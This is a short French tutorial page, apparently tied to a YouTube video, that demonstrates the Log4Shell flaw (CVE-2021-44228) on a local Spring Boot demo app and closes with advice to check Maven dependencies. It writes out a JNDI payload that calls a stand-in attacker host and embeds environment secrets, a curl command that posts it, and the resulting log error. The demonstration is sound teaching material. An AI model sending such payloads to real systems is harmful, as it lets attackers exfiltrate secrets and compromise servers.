
Log4Shell (CVE-2021-44228) est une vulnérabilité zero-day dans Log4j
Découverte : 24 novembre 2021
Correctif : 6 décembre 2021
Cliquez ci-dessous pour la vidéo YouTube
Cette application d'exemple est une application Spring Boot qui utilise log4j comme framework de journalisation et s'exécute avec les variables d'environnement suivantes sur le port 8080 en localhost.
Regardez l'explication en vidéo :
Variables d'environnement
key=jason.bourne;secret=Treadstone
Paramètre :
value=${jndi:ldap://some-random-hacking-site.com}

En utilisant la chaîne suivante, vous pouvez obtenir les variables d'environnement
value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}
curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'
2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
mvn dependency:tree
Assurez-vous qu'aucun des JAR dépendants ne pointe vers une version vulnérable de log4j.
Playlist sécurité Techflix Youtube